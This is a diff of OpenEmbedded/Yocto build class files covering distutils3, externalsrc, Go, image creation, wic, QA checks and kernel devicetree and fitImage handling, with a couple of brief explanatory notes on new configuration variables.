diff --git a/meta/classes/distutils3.bbclass b/meta/classes/distutils3.bbclass
index 7356b5245a..a916a8000c 100644
--- a/meta/classes/distutils3.bbclass
+++ b/meta/classes/distutils3.bbclass
@@ -12,28 +12,30 @@ DISTUTILS_INSTALL_ARGS ?= "--root=${D} \
DISTUTILS_PYTHON = "python3"
DISTUTILS_PYTHON_class-native = "nativepython3"
+DISTUTILS_SETUP_PATH ?= "${S}"
+
distutils3_do_configure() {
:
}
distutils3_do_compile() {
- cd ${S}
+ cd ${DISTUTILS_SETUP_PATH}
NO_FETCH_BUILD=1 \
STAGING_INCDIR=${STAGING_INCDIR} \
STAGING_LIBDIR=${STAGING_LIBDIR} \
- ${STAGING_BINDIR_NATIVE}/${PYTHON_PN}-native/${PYTHON_PN} ${S}/setup.py \
+ ${STAGING_BINDIR_NATIVE}/${PYTHON_PN}-native/${PYTHON_PN} setup.py \
build --build-base=${B} ${DISTUTILS_BUILD_ARGS} || \
bbfatal_log "'${PYTHON_PN} setup.py build ${DISTUTILS_BUILD_ARGS}' execution failed."
}
distutils3_do_compile[vardepsexclude] = "MACHINE"
distutils3_do_install() {
- cd ${S}
+ cd ${DISTUTILS_SETUP_PATH}
install -d ${D}${PYTHON_SITEPACKAGES_DIR}
STAGING_INCDIR=${STAGING_INCDIR} \
STAGING_LIBDIR=${STAGING_LIBDIR} \
PYTHONPATH=${D}${PYTHON_SITEPACKAGES_DIR} \
- ${STAGING_BINDIR_NATIVE}/${PYTHON_PN}-native/${PYTHON_PN} ${S}/setup.py \
+ ${STAGING_BINDIR_NATIVE}/${PYTHON_PN}-native/${PYTHON_PN} setup.py \
build --build-base=${B} install --skip-build ${DISTUTILS_INSTALL_ARGS} || \
bbfatal_log "'${PYTHON_PN} setup.py install ${DISTUTILS_INSTALL_ARGS}' execution failed."
diff --git a/meta/classes/externalsrc.bbclass b/meta/classes/externalsrc.bbclass
index d200129987..9c9451e528 100644
--- a/meta/classes/externalsrc.bbclass
+++ b/meta/classes/externalsrc.bbclass
@@ -60,7 +60,7 @@ python () {
if externalsrcbuild:
d.setVar('B', externalsrcbuild)
else:
- d.setVar('B', '${WORKDIR}/${BPN}-${PV}/')
+ d.setVar('B', '${WORKDIR}/${BPN}-${PV}')
local_srcuri = []
fetch = bb.fetch2.Fetch((d.getVar('SRC_URI') or '').split(), d)
@@ -108,6 +108,15 @@ python () {
if local_srcuri and task in fetch_tasks:
continue
bb.build.deltask(task, d)
+ if bb.data.inherits_class('reproducible_build', d) and task == 'do_unpack':
+ # The reproducible_build's create_source_date_epoch_stamp function must
+ # be run after the source is available and before the
+ # do_deploy_source_date_epoch task. In the normal case, it's attached
+ # to do_unpack as a postfunc, but since we removed do_unpack (above)
+ # we need to move the function elsewhere. The easiest thing to do is
+ # move it into the prefuncs of the do_deploy_source_date_epoch task.
+ # This is safe, as externalsrc runs with the source already unpacked.
+ d.prependVarFlag('do_deploy_source_date_epoch', 'prefuncs', 'create_source_date_epoch_stamp ')
d.prependVarFlag('do_compile', 'prefuncs', "externalsrc_compile_prefunc ")
d.prependVarFlag('do_configure', 'prefuncs', "externalsrc_configure_prefunc ")
@@ -190,6 +199,7 @@ def srctree_hash_files(d, srcdir=None):
import shutil
import subprocess
import tempfile
+ import hashlib
s_dir = srcdir or d.getVar('EXTERNALSRC')
git_dir = None
@@ -197,6 +207,10 @@ def srctree_hash_files(d, srcdir=None):
try:
git_dir = os.path.join(s_dir,
subprocess.check_output(['git', '-C', s_dir, 'rev-parse', '--git-dir'], stderr=subprocess.DEVNULL).decode("utf-8").rstrip())
+ top_git_dir = os.path.join(d.getVar("TOPDIR"),
+ subprocess.check_output(['git', '-C', d.getVar("TOPDIR"), 'rev-parse', '--git-dir'], stderr=subprocess.DEVNULL).decode("utf-8").rstrip())
+ if git_dir == top_git_dir:
+ git_dir = None
except subprocess.CalledProcessError:
pass
@@ -210,7 +224,18 @@ def srctree_hash_files(d, srcdir=None):
env = os.environ.copy()
env['GIT_INDEX_FILE'] = tmp_index.name
subprocess.check_output(['git', 'add', '-A', '.'], cwd=s_dir, env=env)
- sha1 = subprocess.check_output(['git', 'write-tree'], cwd=s_dir, env=env).decode("utf-8")
+ git_sha1 = subprocess.check_output(['git', 'write-tree'], cwd=s_dir, env=env).decode("utf-8")
+ if os.path.exists(os.path.join(s_dir, ".gitmodules")) and os.path.getsize(os.path.join(s_dir, ".gitmodules")) > 0:
+ submodule_helper = subprocess.check_output(["git", "config", "--file", ".gitmodules", "--get-regexp", "path"], cwd=s_dir, env=env).decode("utf-8")
+ for line in submodule_helper.splitlines():
+ module_dir = os.path.join(s_dir, line.rsplit(maxsplit=1)[1])
+ if os.path.isdir(module_dir):
+ proc = subprocess.Popen(['git', 'add', '-A', '.'], cwd=module_dir, env=env, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
+ proc.communicate()
+ proc = subprocess.Popen(['git', 'write-tree'], cwd=module_dir, env=env, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
+ stdout, _ = proc.communicate()
+ git_sha1 += stdout.decode("utf-8")
+ sha1 = hashlib.sha1(git_sha1.encode("utf-8")).hexdigest()
with open(oe_hash_file, 'w') as fobj:
fobj.write(sha1)
ret = oe_hash_file + ':True'
diff --git a/meta/classes/fs-uuid.bbclass b/meta/classes/fs-uuid.bbclass
index 9b53dfba7a..731ea575bd 100644
--- a/meta/classes/fs-uuid.bbclass
+++ b/meta/classes/fs-uuid.bbclass
@@ -4,7 +4,7 @@
def get_rootfs_uuid(d):
import subprocess
rootfs = d.getVar('ROOTFS')
- output = subprocess.check_output(['tune2fs', '-l', rootfs])
+ output = subprocess.check_output(['tune2fs', '-l', rootfs], text=True)
for line in output.split('\n'):
if line.startswith('Filesystem UUID:'):
uuid = line.split()[-1]
diff --git a/meta/classes/go.bbclass b/meta/classes/go.bbclass
index a9e31b50ea..21b1a0271e 100644
--- a/meta/classes/go.bbclass
+++ b/meta/classes/go.bbclass
@@ -115,9 +115,10 @@ go_do_install() {
install -d ${D}${libdir}/go/src/${GO_IMPORT}
tar -C ${S}/src/${GO_IMPORT} -cf - --exclude-vcs --exclude '*.test' --exclude 'testdata' . | \
tar -C ${D}${libdir}/go/src/${GO_IMPORT} --no-same-owner -xf -
- tar -C ${B} -cf - --exclude-vcs pkg | tar -C ${D}${libdir}/go --no-same-owner -xf -
+ tar -C ${B} -cf - --exclude-vcs --exclude '*.test' --exclude 'testdata' pkg | \
+ tar -C ${D}${libdir}/go --no-same-owner -xf -
- if [ -n "`ls ${B}/${GO_BUILD_BINDIR}/`" ]; then
+ if ls ${B}/${GO_BUILD_BINDIR}/* >/dev/null 2>/dev/null ; then
install -d ${D}${bindir}
install -m 0755 ${B}/${GO_BUILD_BINDIR}/* ${D}${bindir}/
fi
@@ -144,11 +145,11 @@ FILES_${PN}-staticdev = "${libdir}/go/pkg"
INSANE_SKIP_${PN} += "ldflags"
-# Add -buildmode=pie to GOBUILDFLAGS to satisfy "textrel" QA checking, but mips
-# doesn't support -buildmode=pie, so skip the QA checking for mips and its
-# variants.
+# Add -buildmode=pie to GOBUILDFLAGS to satisfy "textrel" QA checking, but
+# windows/mips/riscv don't support -buildmode=pie, so skip the QA checking
+# for windows/mips/riscv and their variants.
python() {
- if 'mips' in d.getVar('TARGET_ARCH') or 'riscv' in d.getVar('TARGET_ARCH'):
+ if 'mips' in d.getVar('TARGET_ARCH') or 'riscv' in d.getVar('TARGET_ARCH') or 'windows' in d.getVar('TARGET_GOOS'):
d.appendVar('INSANE_SKIP_%s' % d.getVar('PN'), " textrel")
else:
d.appendVar('GOBUILDFLAGS', ' -buildmode=pie')
diff --git a/meta/classes/goarch.bbclass b/meta/classes/goarch.bbclass
index 1099b95769..ecd3044edd 100644
--- a/meta/classes/goarch.bbclass
+++ b/meta/classes/goarch.bbclass
@@ -114,6 +114,8 @@ def go_map_mips(a, f, d):
def go_map_os(o, d):
if o.startswith('linux'):
return 'linux'
+ elif o.startswith('mingw'):
+ return 'windows'
return o
diff --git a/meta/classes/grub-efi-cfg.bbclass b/meta/classes/grub-efi-cfg.bbclass
index 3a2cdd698b..ea21b3de3d 100644
--- a/meta/classes/grub-efi-cfg.bbclass
+++ b/meta/classes/grub-efi-cfg.bbclass
@@ -120,3 +120,4 @@ python build_efi_cfg() {
cfgfile.close()
}
+build_efi_cfg[vardepsexclude] += "OVERRIDES"
diff --git a/meta/classes/image-live.bbclass b/meta/classes/image-live.bbclass
index 54058b350d..2fa839b0de 100644
--- a/meta/classes/image-live.bbclass
+++ b/meta/classes/image-live.bbclass
@@ -30,7 +30,7 @@ do_bootimg[depends] += "dosfstools-native:do_populate_sysroot \
virtual/kernel:do_deploy \
${MLPREFIX}syslinux:do_populate_sysroot \
syslinux-native:do_populate_sysroot \
- ${PN}:do_image_${@d.getVar('LIVE_ROOTFS_TYPE').replace('-', '_')} \
+ ${@'%s:do_image_%s' % (d.getVar('PN'), d.getVar('LIVE_ROOTFS_TYPE').replace('-', '_')) if d.getVar('ROOTFS') else ''} \
"
@@ -261,4 +261,4 @@ python do_bootimg() {
do_bootimg[subimages] = "hddimg iso"
do_bootimg[imgsuffix] = "."
-addtask bootimg before do_image_complete
+addtask bootimg before do_image_complete after do_rootfs
diff --git a/meta/classes/image.bbclass b/meta/classes/image.bbclass
index 459d872b4a..fbf7206d04 100644
--- a/meta/classes/image.bbclass
+++ b/meta/classes/image.bbclass
@@ -38,7 +38,7 @@ IMAGE_FEATURES[validitems] += "debug-tweaks read-only-rootfs stateless-rootfs em
# Generate companion debugfs?
IMAGE_GEN_DEBUGFS ?= "0"
-# These pacackages will be installed as additional into debug rootfs
+# These packages will additionally be installed into the debug rootfs
IMAGE_INSTALL_DEBUGFS ?= ""
# These packages will be removed from a read-only rootfs after all other
@@ -115,7 +115,7 @@ def rootfs_command_variables(d):
'IMAGE_PREPROCESS_COMMAND','RPM_PREPROCESS_COMMANDS','RPM_POSTPROCESS_COMMANDS','DEB_PREPROCESS_COMMANDS','DEB_POSTPROCESS_COMMANDS']
python () {
- variables = rootfs_command_variables(d) + sdk_command_variables(d)
+ variables = rootfs_command_variables(d)
for var in variables:
if d.getVar(var, False):
d.setVarFlag(var, 'func', '1')
@@ -124,7 +124,7 @@ python () {
def rootfs_variables(d):
from oe.rootfs import variable_depends
variables = ['IMAGE_DEVICE_TABLE','IMAGE_DEVICE_TABLES','BUILD_IMAGES_FROM_FEEDS','IMAGE_TYPES_MASKED','IMAGE_ROOTFS_ALIGNMENT','IMAGE_OVERHEAD_FACTOR','IMAGE_ROOTFS_SIZE','IMAGE_ROOTFS_EXTRA_SPACE',
- 'IMAGE_ROOTFS_MAXSIZE','IMAGE_NAME','IMAGE_LINK_NAME','IMAGE_MANIFEST','DEPLOY_DIR_IMAGE','IMAGE_FSTYPES','IMAGE_INSTALL_COMPLEMENTARY','IMAGE_LINGUAS', 'IMAGE_LINGUAS_COMPLEMENTARY',
+ 'IMAGE_ROOTFS_MAXSIZE','IMAGE_NAME','IMAGE_LINK_NAME','IMAGE_MANIFEST','DEPLOY_DIR_IMAGE','IMAGE_FSTYPES','IMAGE_INSTALL_COMPLEMENTARY','IMAGE_LINGUAS', 'IMAGE_LINGUAS_COMPLEMENTARY', 'IMAGE_LOCALES_ARCHIVE',
'MULTILIBRE_ALLOW_REP','MULTILIB_TEMP_ROOTFS','MULTILIB_VARIANTS','MULTILIBS','ALL_MULTILIB_PACKAGE_ARCHS','MULTILIB_GLOBAL_VARIANTS','BAD_RECOMMENDATIONS','NO_RECOMMENDATIONS',
'PACKAGE_ARCHS','PACKAGE_CLASSES','TARGET_VENDOR','TARGET_ARCH','TARGET_OS','OVERRIDES','BBEXTENDVARIANT','FEED_DEPLOYDIR_BASE_URI','INTERCEPT_DIR','USE_DEVFS',
'CONVERSIONTYPES', 'IMAGE_GEN_DEBUGFS', 'ROOTFS_RO_UNNEEDED', 'IMGDEPLOYDIR', 'PACKAGE_EXCLUDE_COMPLEMENTARY', 'REPRODUCIBLE_TIMESTAMP_ROOTFS', 'IMAGE_INSTALL_DEBUGFS']
@@ -176,10 +176,15 @@ IMAGE_LINGUAS ?= "de-de fr-fr en-gb"
LINGUAS_INSTALL ?= "${@" ".join(map(lambda s: "locale-base-%s" % s, d.getVar('IMAGE_LINGUAS').split()))}"
+# By default, create a locale archive
+IMAGE_LOCALES_ARCHIVE ?= '1'
+
# Prefer image, but use the fallback files for lookups if the image ones
# aren't yet available.
PSEUDO_PASSWD = "${IMAGE_ROOTFS}:${STAGING_DIR_NATIVE}"
+PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/intercept_scripts,${WORKDIR}/oe-rootfs-repo,${WORKDIR}/sstate-build-image_complete"
+
PACKAGE_EXCLUDE ??= ""
PACKAGE_EXCLUDE[type] = "list"
@@ -306,7 +311,7 @@ fakeroot python do_image_qa () {
except oe.utils.ImageQAFailed as e:
qamsg = qamsg + '\tImage QA function %s failed: %s\n' % (e.name, e.description)
except Exception as e:
- qamsg = qamsg + '\tImage QA function %s failed\n' % cmd
+ qamsg = qamsg + '\tImage QA function %s failed: %s\n' % (cmd, e)
if qamsg:
imgname = d.getVar('IMAGE_NAME')
@@ -432,7 +437,7 @@ python () {
localdata.delVar('DATETIME')
localdata.delVar('DATE')
localdata.delVar('TMPDIR')
- vardepsexclude = (d.getVarFlag('IMAGE_CMD_' + realt, 'vardepsexclude', True) or '').split()
+ vardepsexclude = (d.getVarFlag('IMAGE_CMD_' + realt, 'vardepsexclude') or '').split()
for dep in vardepsexclude:
localdata.delVar(dep)
@@ -660,7 +665,7 @@ reproducible_final_image_task () {
fi
# Set mtime of all files to a reproducible value
bbnote "reproducible_final_image_task: mtime set to $REPRODUCIBLE_TIMESTAMP_ROOTFS"
- find ${IMAGE_ROOTFS} -exec touch -h --date=@$REPRODUCIBLE_TIMESTAMP_ROOTFS {} \;
+ find ${IMAGE_ROOTFS} -print0 | xargs -0 touch -h --date=@$REPRODUCIBLE_TIMESTAMP_ROOTFS
fi
}
diff --git a/meta/classes/image_types.bbclass b/meta/classes/image_types.bbclass
index f82f1d8862..6dc0e094d0 100644
--- a/meta/classes/image_types.bbclass
+++ b/meta/classes/image_types.bbclass
@@ -126,7 +126,7 @@ IMAGE_CMD_squashfs-lz4 = "mksquashfs ${IMAGE_ROOTFS} ${IMGDEPLOYDIR}/${IMAGE_NAM
# required when extracting, but it seems prudent to use it in both cases.
IMAGE_CMD_TAR ?= "tar"
# Ignore return code 1 "file changed as we read it" as other tasks (e.g. do_image_wic) may be hardlinking the rootfs
-IMAGE_CMD_tar = "${IMAGE_CMD_TAR} --numeric-owner -cf ${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.tar -C ${IMAGE_ROOTFS} . || [ $? -eq 1 ]"
+IMAGE_CMD_tar = "${IMAGE_CMD_TAR} --sort=name --format=posix --numeric-owner -cf ${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.tar -C ${IMAGE_ROOTFS} . || [ $? -eq 1 ]"
do_image_cpio[cleandirs] += "${WORKDIR}/cpio_append"
IMAGE_CMD_cpio () {
@@ -240,7 +240,7 @@ EXTRA_IMAGECMD_jffs2 ?= "--pad ${JFFS2_ENDIANNESS} --eraseblock=${JFFS2_ERASEBLO
EXTRA_IMAGECMD_ext2 ?= "-i 4096"
EXTRA_IMAGECMD_ext3 ?= "-i 4096"
EXTRA_IMAGECMD_ext4 ?= "-i 4096"
-EXTRA_IMAGECMD_btrfs ?= "-n 4096"
+EXTRA_IMAGECMD_btrfs ?= "-n 4096 --shrink"
EXTRA_IMAGECMD_f2fs ?= ""
do_image_cpio[depends] += "cpio-native:do_populate_sysroot"
diff --git a/meta/classes/image_types_wic.bbclass b/meta/classes/image_types_wic.bbclass
index 196c86814e..ae00acc5ea 100644
--- a/meta/classes/image_types_wic.bbclass
+++ b/meta/classes/image_types_wic.bbclass
@@ -3,9 +3,9 @@
WICVARS ?= "\
BBLAYERS IMGDEPLOYDIR DEPLOY_DIR_IMAGE FAKEROOTCMD IMAGE_BASENAME IMAGE_BOOT_FILES \
IMAGE_LINK_NAME IMAGE_ROOTFS INITRAMFS_FSTYPES INITRD INITRD_LIVE ISODIR RECIPE_SYSROOT_NATIVE \
- ROOTFS_SIZE STAGING_DATADIR STAGING_DIR STAGING_LIBDIR TARGET_SYS \
+ ROOTFS_SIZE STAGING_DATADIR STAGING_DIR STAGING_LIBDIR TARGET_SYS HOSTTOOLS_DIR \
KERNEL_IMAGETYPE MACHINE INITRAMFS_IMAGE INITRAMFS_IMAGE_BUNDLE INITRAMFS_LINK_NAME APPEND \
- ASSUME_PROVIDED"
+ ASSUME_PROVIDED PSEUDO_IGNORE_PATHS"
inherit ${@bb.utils.contains('INITRAMFS_IMAGE_BUNDLE', '1', 'kernel-artifact-names', '', d)}
@@ -29,17 +29,24 @@ WIC_CREATE_EXTRA_ARGS ?= ""
IMAGE_CMD_wic () {
out="${IMGDEPLOYDIR}/${IMAGE_NAME}"
build_wic="${WORKDIR}/build-wic"
+ tmp_wic="${WORKDIR}/tmp-wic"
wks="${WKS_FULL_PATH}"
+ if [ -e "$tmp_wic" ]; then
+ # Ensure we don't have any junk leftover from a previously interrupted
+ # do_image_wic execution
+ rm -rf "$tmp_wic"
+ fi
if [ -z "$wks" ]; then
bbfatal "No kickstart files from WKS_FILES were found: ${WKS_FILES}. Please set WKS_FILE or WKS_FILES appropriately."
fi
-
- BUILDDIR="${TOPDIR}" wic create "$wks" --vars "${STAGING_DIR}/${MACHINE}/imgdata/" -e "${IMAGE_BASENAME}" -o "$build_wic/" ${WIC_CREATE_EXTRA_ARGS}
+ BUILDDIR="${TOPDIR}" PSEUDO_UNLOAD=1 wic create "$wks" --vars "${STAGING_DIR}/${MACHINE}/imgdata/" -e "${IMAGE_BASENAME}" -o "$build_wic/" -w "$tmp_wic" ${WIC_CREATE_EXTRA_ARGS}
mv "$build_wic/$(basename "${wks%.wks}")"*.direct "$out${IMAGE_NAME_SUFFIX}.wic"
}
IMAGE_CMD_wic[vardepsexclude] = "WKS_FULL_PATH WKS_FILES TOPDIR"
do_image_wic[cleandirs] = "${WORKDIR}/build-wic"
+PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/build-wic"
+
# Rebuild when the wks file or vars in WICVARS change
USING_WIC = "${@bb.utils.contains_any('IMAGE_FSTYPES', 'wic ' + ' '.join('wic.%s' % c for c in '${CONVERSIONTYPES}'.split()), '1', '', d)}"
WKS_FILE_CHECKSUM = "${@'${WKS_FULL_PATH}:%s' % os.path.exists('${WKS_FULL_PATH}') if '${USING_WIC}' else ''}"
@@ -87,6 +94,10 @@ python do_write_wks_template () {
bb.utils.copyfile(wks_file, "%s/%s" % (depdir, basename + '-' + os.path.basename(wks_file)))
}
+do_flush_pseudodb() {
+ ${FAKEROOTENV} ${FAKEROOTCMD} -S
+}
+
python () {
if d.getVar('USING_WIC'):
wks_file_u = d.getVar('WKS_FULL_PATH', False)
@@ -140,6 +151,7 @@ python do_rootfs_wicenv () {
depdir = d.getVar('IMGDEPLOYDIR')
bb.utils.copyfile(os.path.join(outdir, basename) + '.env', os.path.join(depdir, basename) + '.env')
}
+addtask do_flush_pseudodb after do_rootfs before do_image do_image_qa
addtask do_rootfs_wicenv after do_image before do_image_wic
do_rootfs_wicenv[vardeps] += "${WICVARS}"
do_rootfs_wicenv[prefuncs] = 'set_image_size'
diff --git a/meta/classes/insane.bbclass b/meta/classes/insane.bbclass
index b5c6b2186f..d6da53252f 100644
--- a/meta/classes/insane.bbclass
+++ b/meta/classes/insane.bbclass
@@ -174,7 +174,7 @@ def package_qa_check_useless_rpaths(file, name, d, elf, messages):
if rpath_eq(rpath, libdir) or rpath_eq(rpath, base_libdir):
# The dynamic linker searches both these places anyway. There is no point in
# looking there again.
- package_qa_add_message(messages, "useless-rpaths", "%s: %s contains probably-redundant RPATH %s" % (name, package_qa_clean_path(file, d), rpath))
+ package_qa_add_message(messages, "useless-rpaths", "%s: %s contains probably-redundant RPATH %s" % (name, package_qa_clean_path(file, d, name), rpath))
QAPATHTEST[dev-so] = "package_qa_check_dev"
def package_qa_check_dev(path, name, d, elf, messages):
@@ -183,8 +183,8 @@ def package_qa_check_dev(path, name, d, elf, messages):
"""
if not name.endswith("-dev") and not name.endswith("-dbg") and not name.endswith("-ptest") and not name.startswith("nativesdk-") and path.endswith(".so") and os.path.islink(path):
- package_qa_add_message(messages, "dev-so", "non -dev/-dbg/nativesdk- package contains symlink .so: %s path '%s'" % \
- (name, package_qa_clean_path(path,d)))
+ package_qa_add_message(messages, "dev-so", "non -dev/-dbg/nativesdk- package %s contains symlink .so '%s'" % \
+ (name, package_qa_clean_path(path, d, name)))
QAPATHTEST[dev-elf] = "package_qa_check_dev_elf"
def package_qa_check_dev_elf(path, name, d, elf, messages):
@@ -194,8 +194,8 @@ def package_qa_check_dev_elf(path, name, d, elf, messages):
install link-time .so files that are linker scripts.
"""
if name.endswith("-dev") and path.endswith(".so") and not os.path.islink(path) and elf:
- package_qa_add_message(messages, "dev-elf", "-dev package contains non-symlink .so: %s path '%s'" % \
- (name, package_qa_clean_path(path,d)))
+ package_qa_add_message(messages, "dev-elf", "-dev package %s contains non-symlink .so '%s'" % \
+ (name, package_qa_clean_path(path, d, name)))
QAPATHTEST[staticdev] = "package_qa_check_staticdev"
def package_qa_check_staticdev(path, name, d, elf, messages):
@@ -208,7 +208,7 @@ def package_qa_check_staticdev(path, name, d, elf, messages):
if not name.endswith("-pic") and not name.endswith("-staticdev") and not name.endswith("-ptest") and path.endswith(".a") and not path.endswith("_nonshared.a") and not '/usr/lib/debug-static/' in path and not '/.debug-static/' in path:
package_qa_add_message(messages, "staticdev", "non -staticdev package contains static .a library: %s path '%s'" % \
- (name, package_qa_clean_path(path,d)))
+ (name, package_qa_clean_path(path,d, name)))
QAPATHTEST[mime] = "package_qa_check_mime"
def package_qa_check_mime(path, name, d, elf, messages):
@@ -452,12 +452,14 @@ def package_qa_check_buildpaths(path, name, d, elf, messages):
"""
Check for build paths inside target files and error if not found in the whitelist
"""
+ import stat
# Ignore .debug files, not interesting
if path.find(".debug") != -1:
return
- # Ignore symlinks
- if os.path.islink(path):
+ # Ignore symlinks/devs/fifos
+ mode = os.lstat(path).st_mode
+ if stat.S_ISLNK(mode) or stat.S_ISBLK(mode) or stat.S_ISFIFO(mode) or stat.S_ISCHR(mode) or stat.S_ISSOCK(mode):
return
tmpdir = bytes(d.getVar('TMPDIR'), encoding="utf-8")
@@ -945,7 +947,7 @@ def package_qa_check_host_user(path, name, d, elf, messages):
dest = d.getVar('PKGDEST')
pn = d.getVar('PN')
- home = os.path.join(dest, 'home')
+ home = os.path.join(dest, name, 'home')
if path == home or path.startswith(home + os.sep):
return
@@ -1012,26 +1014,6 @@ python do_package_qa () {
logdir = d.getVar('T')
pn = d.getVar('PN')
- # Check the compile log for host contamination
- compilelog = os.path.join(logdir,"log.do_compile")
-
- if os.path.exists(compilelog):
- statement = "grep -e 'CROSS COMPILE Badness:' -e 'is unsafe for cross-compilation' %s > /dev/null" % compilelog
- if subprocess.call(statement, shell=True) == 0:
- msg = "%s: The compile log indicates that host include and/or library paths were used.\n \
- Please check the log '%s' for more information." % (pn, compilelog)
- package_qa_handle_error("compile-host-path", msg, d)
-
- # Check the install log for host contamination
- installlog = os.path.join(logdir,"log.do_install")
-
- if os.path.exists(installlog):
- statement = "grep -e 'CROSS COMPILE Badness:' -e 'is unsafe for cross-compilation' %s > /dev/null" % installlog
- if subprocess.call(statement, shell=True) == 0:
- msg = "%s: The install log indicates that host include and/or library paths were used.\n \
- Please check the log '%s' for more information." % (pn, installlog)
- package_qa_handle_error("install-host-path", msg, d)
-
# Scan the packages...
pkgdest = d.getVar('PKGDEST')
packages = set((d.getVar('PACKAGES') or '').split())
@@ -1210,7 +1192,7 @@ python do_qa_configure() {
if bb.data.inherits_class('autotools', d) and not skip_configure_unsafe:
bb.note("Checking autotools environment for common misconfiguration")
for root, dirs, files in os.walk(workdir):
- statement = "grep -q -F -e 'CROSS COMPILE Badness:' -e 'is unsafe for cross-compilation' %s" % \
+ statement = "grep -q -F -e 'is unsafe for cross-compilation' %s" % \
os.path.join(root,"config.log")
if "config.log" in files:
if subprocess.call(statement, shell=True) == 0:
diff --git a/meta/classes/kernel-arch.bbclass b/meta/classes/kernel-arch.bbclass
index 07ec242e63..4cd08b96fb 100644
--- a/meta/classes/kernel-arch.bbclass
+++ b/meta/classes/kernel-arch.bbclass
@@ -61,8 +61,8 @@ HOST_LD_KERNEL_ARCH ?= "${TARGET_LD_KERNEL_ARCH}"
TARGET_AR_KERNEL_ARCH ?= ""
HOST_AR_KERNEL_ARCH ?= "${TARGET_AR_KERNEL_ARCH}"
-KERNEL_CC = "${CCACHE}${HOST_PREFIX}gcc ${HOST_CC_KERNEL_ARCH} -fuse-ld=bfd ${DEBUG_PREFIX_MAP} -fdebug-prefix-map=${STAGING_KERNEL_DIR}=${KERNEL_SRC_PATH}"
+KERNEL_CC = "${CCACHE}${HOST_PREFIX}gcc ${HOST_CC_KERNEL_ARCH} -fuse-ld=bfd ${DEBUG_PREFIX_MAP} -fdebug-prefix-map=${STAGING_KERNEL_DIR}=${KERNEL_SRC_PATH} -fdebug-prefix-map=${STAGING_KERNEL_BUILDDIR}=${KERNEL_SRC_PATH}"
KERNEL_LD = "${CCACHE}${HOST_PREFIX}ld.bfd ${HOST_LD_KERNEL_ARCH}"
KERNEL_AR = "${CCACHE}${HOST_PREFIX}ar ${HOST_AR_KERNEL_ARCH}"
-TOOLCHAIN = "gcc"
+TOOLCHAIN ?= "gcc"
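
With TOOLCHAIN now a weak default rather than a hard assignment, the kernel compiler can be selected from configuration instead of by patching the class. A minimal sketch, assuming a layer that actually provides clang support (meta-clang, for instance):

    # local.conf or a kernel recipe append (illustrative)
    TOOLCHAIN = "clang"
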
diff --git a/meta/classes/kernel-devicetree.bbclass b/meta/classes/kernel-devicetree.bbclass
index 81dda8003f..27a4905ac6 100644
--- a/meta/classes/kernel-devicetree.bbclass
+++ b/meta/classes/kernel-devicetree.bbclass
@@ -1,14 +1,20 @@
# Support for device tree generation
-PACKAGES_append = " \
- ${KERNEL_PACKAGE_NAME}-devicetree \
- ${@[d.getVar('KERNEL_PACKAGE_NAME') + '-image-zimage-bundle', ''][d.getVar('KERNEL_DEVICETREE_BUNDLE') != '1']} \
-"
+python () {
+ if not bb.data.inherits_class('nopackages', d):
+ d.appendVar("PACKAGES", " ${KERNEL_PACKAGE_NAME}-devicetree")
+ if d.getVar('KERNEL_DEVICETREE_BUNDLE') == '1':
+ d.appendVar("PACKAGES", " ${KERNEL_PACKAGE_NAME}-image-zimage-bundle")
+}
+
FILES_${KERNEL_PACKAGE_NAME}-devicetree = "/${KERNEL_IMAGEDEST}/*.dtb /${KERNEL_IMAGEDEST}/*.dtbo"
FILES_${KERNEL_PACKAGE_NAME}-image-zimage-bundle = "/${KERNEL_IMAGEDEST}/zImage-*.dtb.bin"
# Generate kernel+devicetree bundle
KERNEL_DEVICETREE_BUNDLE ?= "0"
+# dtc flags passed via DTC_FLAGS env variable
+KERNEL_DTC_FLAGS ?= ""
+
normalize_dtb () {
dtb="$1"
if echo $dtb | grep -q '/dts/'; then
@@ -50,6 +56,10 @@ do_configure_append() {
}
do_compile_append() {
+ if [ -n "${KERNEL_DTC_FLAGS}" ]; then
+ export DTC_FLAGS="${KERNEL_DTC_FLAGS}"
+ fi
+
for dtbf in ${KERNEL_DEVICETREE}; do
dtb=`normalize_dtb "$dtbf"`
oe_runmake $dtb CC="${KERNEL_CC} $cc_extra " LD="${KERNEL_LD}" ${KERNEL_EXTRA_ARGS}
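
The new KERNEL_DTC_FLAGS variable is simply exported to the kernel build as DTC_FLAGS, so a machine configuration could, for instance, ask dtc to emit overlay symbols (illustrative value):

    KERNEL_DTC_FLAGS = "-@"
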
diff --git a/meta/classes/kernel-fitimage.bbclass b/meta/classes/kernel-fitimage.bbclass
index 72b05ff8d1..7c7bcd3fc0 100644
--- a/meta/classes/kernel-fitimage.bbclass
+++ b/meta/classes/kernel-fitimage.bbclass
@@ -1,5 +1,7 @@
inherit kernel-uboot kernel-artifact-names uboot-sign
+KERNEL_IMAGETYPE_REPLACEMENT = ""
+
python __anonymous () {
kerneltypes = d.getVar('KERNEL_IMAGETYPES') or ""
if 'fitImage' in kerneltypes.split():
@@ -21,6 +23,8 @@ python __anonymous () {
else:
replacementtype = "zImage"
+ d.setVar("KERNEL_IMAGETYPE_REPLACEMENT", replacementtype)
+
# Override KERNEL_IMAGETYPE_FOR_MAKE variable, which is internal
# to kernel.bbclass . We have to override it, since we pack zImage
# (at least for now) into the fitImage .
@@ -45,6 +49,8 @@ python __anonymous () {
if d.getVar('UBOOT_SIGN_ENABLE') == "1" and d.getVar('UBOOT_DTB_BINARY'):
uboot_pn = d.getVar('PREFERRED_PROVIDER_u-boot') or 'u-boot'
d.appendVarFlag('do_assemble_fitimage', 'depends', ' %s:do_populate_sysroot' % uboot_pn)
+ if d.getVar('INITRAMFS_IMAGE_BUNDLE') == "1":
+ d.appendVarFlag('do_assemble_fitimage_initramfs', 'depends', ' %s:do_populate_sysroot' % uboot_pn)
}
# Options for the device tree compiler passed to mkimage '-D' feature:
@@ -56,6 +62,12 @@ FIT_HASH_ALG ?= "sha256"
# fitImage Signature Algo
FIT_SIGN_ALG ?= "rsa2048"
+# fitImage Padding Algo
+FIT_PAD_ALG ?= "pkcs-1.5"
+
+# Arguments passed to mkimage for signing
+UBOOT_MKIMAGE_SIGN_ARGS ?= ""
+
#
# Emit the fitImage ITS header
#
